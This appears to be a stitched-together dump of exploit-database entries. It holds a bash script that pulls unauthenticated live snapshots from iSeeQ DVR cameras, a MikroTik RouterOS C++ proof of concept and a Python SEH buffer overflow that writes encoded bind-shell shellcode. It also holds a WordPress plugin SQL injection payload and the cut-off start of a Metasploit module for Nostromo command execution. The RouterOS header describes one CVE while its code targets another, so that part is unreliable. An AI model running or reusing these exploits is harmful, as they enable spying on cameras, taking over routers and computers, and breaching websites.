#!/bin/bash
#
#
# iSeeQ Hybrid DVR WH-H4 1.03R / 2.0.0.P (get_jpeg) Stream Disclosure
#
#
# Vendor: iSeeQ
# Product web page: http://www.iseeq.co.kr
# Affected version: WH-H4 1.03R / 2.0.0.P
#
# Summary: The 4/8/16 channel hybrid standalone DVR delivers high quality
# pictures which adopts high performance video processing chips and embedded
# Linux system. This advanced video digital platform is very useful to identify
# an object from a long distance.
#
# Desc: The DVR suffers from an unauthenticated and unauthorized live stream
# disclosure when get_jpeg script is called.
#
# Tested on: Boa/0.94.13
#            PHP/7.0.22
#            DVR Web Server
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2019-5539
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5539.php
#
#
# 28.10.2019
#


if [ "$#" -ne 2 ]; then
    echo "Usage: $0 IP:PORT CHANNEL"
    exit
fi
IP=$1
CHANNEL=$2
HOST="http://$IP/cgi-bin/get_jpeg?ch=$CHANNEL"
STATUS=$(curl -Is http://$IP/cgi-bin/php/login.php 2>/dev/null | head -1 | awk -F""'{print $2}')
if [ "$STATUS" == "404" ]; then
    echo "Target not vulnerable!"
    exit
fi
echo "Collecting snapshots..."
for x in {1..10};
    do echo -ne $x
    curl "$HOST" -o seq-$x.jpg -#;
    sleep 0.8
    done
echo -ne "\nDone."
echo -ne "\nRendering video..."
ffmpeg -t 10 -v quiet -s 352x288 -r 1 -an -i seq-%01d.jpg -c:v libx264 -vf fps=10 -pix_fmt yuvj422p clip.mp4
echo " done."
echo -ne "\nRunning animation..."
sleep 1
cvlc clip.mp4 --verbose -1 -f vlc://quit

# Exploit Title: MikroTik RouterOS 6.45.6 - DNS Cache Poisoning
# Date: 2019-10-30
# Exploit Author: Jacob Baines
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download
# Version: 6.45.6 Stable (and below) or 6.44.5 Long-term (and below)
# Tested on: Various x86 and MIPSBE RouterOS installs
# CVE : CVE-2019-3978
# Writeup: https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
# Disclosure: https://www.tenable.com/security/research/tra-2019-46

# Unauthenticated DNS request via Winbox
# RouterOS before 6.45.7 (stable) and 6.44.6 (Long-term) allowed an unauthenticated remote user trigger DNS requests 
# to a user specified DNS server via port 8291 (winbox). The DNS response then gets cached by RouterOS, setting up 
# a perfect situation for unauthenticated DNS cache poisoning. This is assigned CVE-2019-3978.

# This PoC takes a target ip/port (router) and a DNS server (e.g. 8.8.8.8). 
# The PoC will always send a DNS request for example.com. In the following write up, 
# I detail how to use this to poison the routers cache:

# https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21

# Note that the writup focuses on router's configured *without* the DNS server enabled. 
# Obviously this attack is significantly more powerful when downstream clients use the router as a DNS server.

## What are the build dependencies?
# This requires:

# * Boost 1.66 or higher
# * cmake

## How do I build this jawn?

# Just normal cmake. Try this:

# ```sh
# mkdir build
# cd build
# cmake ..
# make
# ```

# Resolve dependencies as needed.

## Usage Example

# ```sh
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
# -> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
# <- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
# albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
# ...
# [admin@MikroTik] > ip dns cache print
# Flags: S - static
# #   NAME                               ADDRESS                                                              TTL        
# 0   example.com                        93.184.216.34                                                        5h57m57s    
# [admin@MikroTik] >
# ```

# Source:
# https://github.com/tenable/routeros/tree/master/poc/winbox_dns_request


/*
    Copyright 2019 Tenable, Inc.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                *

    Redistribution and use in source and binary forms, with or without modification,
    are permitted provided that the following conditions are met:

    1. Redistributions of source code must retain the above copyright notice, this
        list of conditions and the following disclaimer.

    2. Redistributions in binary form must reproduce the above copyright notice,
        this list of conditions and the following disclaimer in the documentation
        and/or other materials provided with the distribution.

    3. Neither the name of the copyright holder nor the names of its contributors
        may be used to endorse or promote products derived from this software
        without specific prior written permission.

    THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
    AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
    IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
    ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
    LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
    CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
    POSSIBILITY OF SUCH DAMAGE.
*/
#include <fstream>
#include <cstdlib>
#include <iostream>
#include <boost/cstdint.hpp>
#include <boost/program_options.hpp>
#include <boost/algorithm/string.hpp>

#include "winbox_session.hpp"
#include "winbox_message.hpp"

namespace
{
    const char s_version[] = "CVE-2019-3943 PoC Using SNMP dlopen";

    bool parseCommandLine(int p_argCount, const char* p_argArray[],
                          std::string& p_username, std::string& p_password,
                          std::string& p_ip, std::string& p_port)
    {
        boost::program_options::options_description description("options");
        description.add_options()
        ("help,h", "A list of command line options")
        ("version,v", "Display version information")
        ("username,u", boost::program_options::value<std::string>(), "The user to log in as")
        ("password", boost::program_options::value<std::string>(), "The password to log in with")
        ("port,p", boost::program_options::value<std::string>()->default_value("8291"), "The Winbox port to connect to")
        ("ip,i", boost::program_options::value<std::string>(), "The IPv4 address to connect to");

        boost::program_options::variables_map argv_map;
        try
        {
            boost::program_options::store(
                boost::program_options::parse_command_line(
                    p_argCount, p_argArray, description), argv_map);
        }
        catch (const std::exception& e)
        {
            std::cerr << e.what() << "\n"<< std::endl;
            std::cerr << description << std::endl;
            return false;
        }

        boost::program_options::notify(argv_map);
        if (argv_map.empty() || argv_map.count("help"))
        {
            std::cerr << description << std::endl;
            return false;
        }

        if (argv_map.count("version"))
        {
            std::cerr << "Version: "<< ::s_version << std::endl;
            return false;
        }

        if (argv_map.count("username") && argv_map.count("ip") &
            argv_map.count("port"))
        {
            p_username.assign(argv_map["username"].as<std::string>());
            p_ip.assign(argv_map["ip"].as<std::string>());
            p_port.assign(argv_map["port"].as<std::string>());

            if (argv_map.count("password"))
            {
                p_password.assign(argv_map["password"].as<std::string>());
            }
            else
            {
                p_password.assign("");
            }
            return true;
        }
        else
        {
            std::cerr << description << std::endl;
        }

        return false;
    }
}

int main(int p_argc, const char** p_argv)
{
    std::string username;
    std::string password;
    std::string ip;
    std::string port;
    if (!parseCommandLine(p_argc, p_argv, username, password, ip, port))
    {
        return EXIT_FAILURE;
    }
    Winbox_Session winboxSession(ip, port);
    if (!winboxSession.connect())
    {
        std::cerr << "Failed to connect to the remote host"<< std::endl;
        return EXIT_FAILURE;
    }

    boost::uint32_t p_session_id = 0;
    if (!winboxSession.login(username, password, p_session_id))
    {
        std::cerr << "[-] Login failed."<< std::endl;
        return false;
    }

    WinboxMessage msg;
    msg.set_to(0x4c);
    msg.set_command(0xa0065);
    msg.set_request_id(1);
    msg.set_reply_expected(true);
    msg.add_u32(5,80); // height
    msg.add_u32(6,24); // width
    msg.add_u32(8,1);  // controls method. 0 (nova/bin/login), 1 (telnet), 2 (ssh), 3 (mactel), 4 (nova/bin/telser), default...
    msg.add_string(0x0a, username); //username
    msg.add_string(1,"");
    msg.add_string(7, "vt102");
    msg.add_string(9, "-l a"); // drop into telnet client shell
    winboxSession.send(msg);

    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response."<< std::endl;
        return EXIT_FAILURE;
    }

    if (msg.has_error())
    {
        std::cout << "error: "<< msg.get_error_string() << std::endl;
    }

    boost::uint32_t session_id = msg.get_u32(0xfe0001);

    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0068);
    msg.set_request_id(2);
    msg.set_reply_expected(true);
    msg.add_u32(5,82);
    msg.add_u32(6,24);
    msg.add_u32(0xfe0001, session_id);
    winboxSession.send(msg);

    boost::uint32_t tracker = 0;
    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response."<< std::endl;
        return EXIT_FAILURE;
    }

    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0067);
    msg.set_request_id(3);
    msg.set_reply_expected(true);
    msg.add_u32(3, tracker);
    msg.add_u32(0xfe0001, session_id);
    winboxSession.send(msg);

    msg.reset();
    if (!winboxSession.receive(msg))
    {
        std::cerr << "Error receiving a response."<< std::endl;
        return EXIT_FAILURE;
    }

    if (msg.has_error())
    {
        std::cout << msg.serialize_to_json() << std::endl;
        std::cout << "error: "<< msg.get_error_string() << std::endl;
        return EXIT_FAILURE;
    }
    else if (!msg.get_raw(0x02).empty())
    {
        std::string raw_payload(msg.get_raw(0x02));
        tracker += raw_payload.size();
    }

    //{u3:1047,ufe0001:0,uff0007:655463,r2:[115],Uff0001:[76],Uff0002:[0,456]}
    msg.reset();
    msg.set_to(0x4c);
    msg.set_command(0xa0067);
    msg.set_request_id(4);
    msg.set_reply_expected(true);
    msg.add_u32(3, tracker);
    msg.add_u32(0xfe0001, session_id);
    msg.add_raw(2, "set tracefile /pckg/option\n");
    winboxSession.send(msg);

    bool found_telnet_prompt = false;
    while (!found_telnet_prompt)
    {
        msg.reset();
        if (!winboxSession.receive(msg))
        {
            std::cerr << "Error receiving a response."<< std::endl;
            return EXIT_FAILURE;
        }

        if (msg.has_error())
        {
            std::cout << msg.serialize_to_json() << std::endl;
            std::cout << "error: "<< msg.get_error_string() << std::endl;
            return EXIT_FAILURE;
        }
        else if (!msg.get_raw(0x02).empty())
        {
            std::string raw_payload(msg.get_raw(0x02));
            if (raw_payload.find("telnet> ") != std::string::npos)
            {
                std::cout << "Success!"<< std::endl;
                found_telnet_prompt = true;
            }
        }
    }

    return EXIT_SUCCESS;
}

# Exploit Title: WMV to AVI MPEG DVD WMV Convertor 4.6.1217 - Buffer OverFlow (SEH)
# Google Dork: N/A
# Date: 2019-10-30
# Exploit Author: Doan Nguyen (4ll4u)
# Vendor Homepage:https://www.alloksoft.com/
# Software Link:  https://www.alloksoft.com/wmv.htm
# Version: v4.6.1217
# Tested on: Windows XP SP3
# CVE : N/A
# Reference from : [1] https://www.exploit-db.com/exploits/47563        

# 1.- Run python code :poc.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open  WMV to AVI MPEG DVD WMV Convertor and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'License Name and License Code'
# 5.- Click 'OK' and you will get a bind shell on port 4444

#msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -b '\x00' -f hex
#We need to create meaningful characters when pasting into the password on the application (allow characters include:\x21->\x7E in ASCII TABLE)
shellcode = (
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x2A\x52\x25\x2D\x53\x2A\x52\x25\x2D\x55\x2A\x52\x25\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x34\x4D\x68\x2D\x23\x34\x4D\x68\x2D\x24\x36\x4D\x69\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x5C\x30\x75\x2D\x62\x5C\x30\x75\x2D\x62\x5E\x31\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x73\x71\x3B\x2D\x60\x73\x71\x3B\x2D\x61\x75\x73\x3D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x39\x6F\x40\x2D\x4B\x39\x6F\x40\x2D\x4C\x39\x70\x40\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x47\x44\x27\x2D\x62\x47\x44\x27\x2D\x63\x47\x45\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x35\x2D\x38\x49\x2A\x36\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x68\x26\x2D\x5D\x71\x6A\x28\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x47\x21\x25\x28\x2D\x47\x21\x25\x28\x2D\x49\x22\x27\x29\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x44\x56\x34\x3C\x2D\x44\x56\x34\x3C\x2D\x45\x58\x35\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x57\x31\x33\x44\x2D\x57\x31\x33\x44\x2D\x58\x32\x34\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x6E\x4F\x50\x2D\x3C\x6E\x4F\x50\x2D\x3E\x70\x50\x52\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x38\x33\x5F\x2D\x3F\x38\x33\x5F\x2D\x40\x39\x33\x60\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x4D\x38\x22\x2D\x6F\x4D\x38\x22\x2D\x6F\x4F\x3A\x24\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x72\x56\x55\x2D\x62\x72\x56\x55\x2D\x63\x74\x58\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4B\x66\x52\x53\x2D\x4B\x66\x52\x53\x2D\x4C\x67\x52\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3B\x22\x35\x71\x2D\x3B\x22\x35\x71\x2D\x3C\x22\x37\x72\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x4F\x64\x55\x2D\x2E\x4F\x64\x55\x2D\x2E\x51\x65\x55\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x48\x59\x5A\x2D\x59\x48\x59\x5A\x2D\x5B\x4A\x59\x5B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x62\x5C\x5A\x2D\x49\x62\x5C\x5A\x2D\x4A\x64\x5C\x5C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x63\x54\x2A\x47\x2D\x63\x54\x2A\x47\x2D\x65\x55\x2A\x47\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x4D\x4D\x43\x2D\x48\x4D\x4D\x43\x2D\x49\x4F\x4E\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x75\x60\x3A\x2D\x30\x75\x60\x3A\x2D\x32\x75\x60\x3A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x60\x6B\x3F\x52\x2D\x60\x6B\x3F\x52\x2D\x60\x6D\x40\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x47\x21\x58\x2D\x3F\x47\x21\x58\x2D\x3F\x49\x22\x58\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x25\x4A\x2D\x65\x4E\x27\x4C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3E\x35\x60\x46\x2D\x3E\x35\x60\x46\x2D\x3E\x37\x60\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x45\x2E\x2D\x41\x2D\x45\x2E\x2D\x41\x2D\x45\x30\x2E\x42\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6C\x4B\x74\x4C\x2D\x6C\x4B\x74\x4C\x2D\x6E\x4C\x74\x4C\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x42\x43\x29\x26\x2D\x42\x43\x29\x26\x2D\x43\x43\x2A\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x61\x43\x34\x2D\x2F\x61\x43\x34\x2D\x31\x61\x45\x34\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x50\x58\x4B\x69\x2D\x50\x58\x4B\x69\x2D\x52\x59\x4D\x6A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x71\x29\x29\x39\x2D\x71\x29\x29\x39\x2D\x73\x2B\x2A\x39\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x68\x52\x6D\x2D\x54\x68\x52\x6D\x2D\x55\x68\x52\x6D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x3C\x5B\x64\x2D\x20\x3C\x5B\x64\x2D\x21\x3E\x5B\x66\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x58\x6E\x65\x6B\x2D\x58\x6E\x65\x6B\x2D\x5A\x6F\x67\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x26\x52\x23\x2D\x69\x26\x52\x23\x2D\x69\x27\x54\x25\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x46\x3F\x27\x71\x2D\x46\x3F\x27\x71\x2D\x48\x40\x29\x72\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x24\x52\x54\x2D\x3C\x24\x52\x54\x2D\x3E\x26\x54\x54\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x40\x4F\x55\x2D\x5C\x40\x4F\x55\x2D\x5D\x40\x51\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x33\x58\x2D\x6A\x5C\x34\x59\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x3E\x5A\x5D\x2D\x5F\x40\x5C\x5E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x4D\x6A\x3B\x2D\x49\x4D\x6A\x3B\x2D\x4A\x4F\x6C\x3C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x23\x6B\x3D\x2D\x62\x23\x6B\x3D\x2D\x63\x23\x6B\x3F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x6A\x57\x67\x2D\x23\x6A\x57\x67\x2D\x24\x6C\x57\x67\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x23\x43\x60\x50\x2D\x23\x43\x60\x50\x2D\x25\x43\x60\x50\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x31\x34\x2A\x2D\x73\x33\x34\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x38\x56\x63\x59\x2D\x38\x56\x63\x59\x2D\x39\x56\x65\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x52\x60\x66\x2D\x40\x52\x60\x66\x2D\x41\x53\x61\x67\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x24\x61\x73\x2A\x2D\x24\x61\x73\x2A\x2D\x26\x61\x75\x2A\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x48\x34\x53\x66\x2D\x48\x34\x53\x66\x2D\x48\x34\x54\x68\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3C\x26\x57\x26\x2D\x3C\x26\x57\x26\x2D\x3C\x27\x58\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x2D\x54\x63\x3A\x27\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x26\x26\x2F\x50\x2D\x26\x26\x2F\x50\x2D\x27\x27\x2F\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x30\x52\x2E\x62\x2D\x30\x52\x2E\x62\x2D\x30\x54\x30\x63\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x31\x5A\x75\x73\x2D\x31\x5A\x75\x73\x2D\x32\x5B\x75\x75\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x41\x66\x56\x2D\x36\x41\x66\x56\x2D\x36\x42\x68\x57\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x36\x63\x50\x32\x2D\x36\x63\x50\x32\x2D\x36\x63\x51\x33\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x59\x4B\x23\x26\x2D\x59\x4B\x23\x26\x2D\x5A\x4C\x24\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x68\x4A\x4D\x2D\x28\x68\x4A\x4D\x2D\x2A\x69\x4B\x4F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2E\x41\x53\x6A\x2D\x2E\x41\x53\x6A\x2D\x30\x42\x55\x6A\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6D\x2D\x6F\x6A\x2F\x6E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2C\x44\x30\x30\x2D\x2C\x44\x30\x30\x2D\x2D\x46\x30\x31\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4A\x67\x69\x4F\x2D\x4A\x67\x69\x4F\x2D\x4A\x69\x69\x51\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x65\x44\x45\x68\x2D\x65\x44\x45\x68\x2D\x66\x44\x45\x6A\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6F\x57\x32\x45\x2D\x6F\x57\x32\x45\x2D\x6F\x59\x34\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x35\x2C\x45\x43\x2D\x35\x2C\x45\x43\x2D\x37\x2C\x46\x45\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x69\x4A\x5A\x6D\x2D\x69\x4A\x5A\x6D\x2D\x6A\x4A\x5C\x6F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2F\x54\x6B\x5E\x2D\x2F\x54\x6B\x5E\x2D\x2F\x56\x6B\x60\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x40\x25\x6E\x55\x2D\x40\x25\x6E\x55\x2D\x41\x26\x6E\x57\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x52\x6F\x33\x2D\x2D\x52\x6F\x33\x2D\x2D\x52\x70\x33\x2F\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3A\x6E\x6D\x3D\x2D\x3A\x6E\x6D\x3D\x2D\x3B\x6E\x6E\x3E\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x3D\x41\x4F\x2D\x4E\x3D\x41\x4F\x2D\x4F\x3D\x42\x4F\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x28\x48\x64\x2D\x49\x28\x48\x64\x2D\x4A\x28\x49\x64\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x73\x2E\x5A\x59\x2D\x73\x2E\x5A\x59\x2D\x74\x2E\x5A\x59\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x4E\x68\x29\x3A\x2D\x4E\x68\x29\x3A\x2D\x4F\x68\x2B\x3B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x21\x32\x38\x36\x2D\x21\x32\x38\x36\x2D\x22\x32\x38\x36\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x53\x4C\x2B\x47\x2D\x53\x4C\x2B\x47\x2D\x54\x4C\x2B\x47\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x5C\x2F\x47\x6B\x2D\x5C\x2F\x47\x6B\x2D\x5E\x31\x47\x6B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x37\x5C\x2D\x6D\x35\x39\x5D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x28\x35\x41\x22\x2D\x28\x35\x41\x22\x2D\x28\x36\x43\x22\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x2D\x40\x6F\x2B\x2D\x2D\x40\x6F\x2B\x2D\x2F\x41\x6F\x2C\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x20\x42\x3C\x2B\x2D\x20\x42\x3C\x2B\x2D\x21\x43\x3E\x2D\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x3F\x4E\x54\x2B\x2D\x3F\x4E\x54\x2B\x2D\x3F\x50\x54\x2B\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x29\x69\x53\x44\x2D\x29\x69\x53\x44\x2D\x2B\x6A\x54\x46\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x62\x6B\x6F\x39\x2D\x62\x6B\x6F\x39\x2D\x62\x6C\x6F\x39\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x67\x6C\x40\x26\x2D\x67\x6C\x40\x26\x2D\x69\x6E\x41\x27\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x49\x59\x36\x44\x2D\x49\x59\x36\x44\x2D\x4A\x59\x37\x46\x50\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x61\x68\x61\x2E\x2D\x61\x68\x61\x2E\x2D\x61\x68\x63\x2E\x50"
"\x25\x4A\x4D\x4E\x55\x25\x35\x32\x31\x2A\x2D\x70\x6f\x6f\x6f\x50\x50\x50" # push 12 NOP 
)

alignment = "\x54\x58\x2d\x54\x54\x54\x54\x2d\x37\x63\x54\x54\x2d\x25\x31\x57\x57\x50\x5C" # stack alignment 001292C0 - 0012AA10
jump_short = "\x90\x90\xEB\x08"  # jump to 00129A44
pop_pop_ret ="\x09\x9a\x01\x10" # pop pop ret in SkinMagic.dll
buffer = "\x41" * 780 + jump_short + pop_pop_ret + "\x41\x41\x41\x41" + alignment + shellcode + (6000 - 780 - 4 - 4 - len(shellcode) - len(alignment)) * "\x45"

try:
    f=open("shell.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(buffer)
    f.write(buffer)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

# Exploit Title: Wordpress Plugin Google Review Slider 6.1 - 'tid' SQL Injection
# Google Dork: inurl:"/wp-content/plugins/wp-google-places-review-slider/"
# Date: 2019-07-02
# Exploit Author: Princy Edward
# Exploit Author Blog : https://prinyedward.blogspot.com/
# Vendor Homepage: https://wordpress.org/plugins/wp-google-places-review-slider/
# Version: 6.1
# Tested on: Apache/2.2.24 (CentOS)
# CVE : 

#POC :

GET/wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***
&taction=edit HTTP/1.1

#SQLMAP Result :
sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM
(SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

# Changeset:
# Issue fixed in version 6.2
# https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2180197%40wp-google-places-review-slider&old=2163061%40wp-google-places-review-slider&sfp_email=&sfph_mail=

Cheers!
PrincyEdward

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Nostromo Directory Traversal Remote Command Execution',
'Description'    => %q{
